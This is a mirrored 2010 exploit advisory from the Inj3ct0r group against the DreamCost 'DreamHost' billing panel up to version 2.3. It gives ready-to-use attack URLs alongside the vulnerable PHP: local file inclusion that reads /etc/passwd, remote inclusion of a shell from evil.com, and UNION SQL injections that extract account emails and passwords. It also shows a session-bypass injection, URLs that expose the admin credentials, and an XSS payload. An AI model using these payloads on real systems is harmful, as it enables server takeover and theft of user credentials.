Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23416
HistoryMar 21, 2010 - 12:00 a.m.

DreamHost <= && > 2.3 global Inj3ct0r/Xss/Local inc Multiple Exploit

2010-03-2100:00:00
vulners.com
34
JSON

=================================================
DreamHost <= && > 2.3 global inj3ct0r.com Exploit

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Decided to make a review to DreamHost - Billing Panel
Site product: dreamcost.com
Version: <= && > 2.3

Local Include Exploit:

/members.php?page=/…/…/…/…/…/…/…/…/…/…/etc/passwd%00

Vulnerable code:

// member_template.html
<?
include("member_$page.html");
?>

Remote Include Exploit:

/admin/?page=http://evil.com/shell.php?

Vulnerable code:

// /admin/template.html
include("$page$page_ext");

Sql Inj3ct0r Exploit:

members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun
t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1
7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH
ERE+account_id=1%20–%20&session_id=you session_id

and

members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun
t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1
7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH
ERE+account_id=1%20–%20&session_id=-1'+OR+login_logged=0x59%20–%20

Vulnerable code:

// member_orders_view.html
$db = new ps_DB;
$q = "SELECT * FROM orders WHERE order_id='$order_id' AND
order_account_id='$account_id' ORDER BY order_id";

Admin Login: members.php?Page=static&content=login
Admin Password: members.php?Page=static&content=password
Path: members.php?Page=static&content=path

Vulnerable code:

// member_static.thml
<? echo setup($content);?>

// functions.php
function setup($field) {
$db = new ps_DB;
$q = "SELECT setup_$field FROM setup WHERE setup_id='1'";
$db->query($q);
$db->next_record();

    $ret = $db-&gt;f&#40;&quot;setup_$field&quot;&#41;; 
  return $ret;

}
$db->query($q);

SQL-Inj3ct0r entry under randomly Account

members.php?page=account&session_id=-1'+OR+login_logged=0x59%20-%20

Vulnerable code:

// member_account.html
$pass = is_logged($session_id);

// functions.php
function is_logged($session_id) {
$db = new ps_DB;
$q = "SELECT * FROM login WHERE login_id = '$session_id'";
$db->query($q);
$db->next_record();
$ret = $db->f("login_logged");
return $ret;
}

Xss Exploit:

/members.php?page=static&content=<script>alert('inj3ct0r.com')</script>

Inj3ct0r.com [2010-03-21]

JSON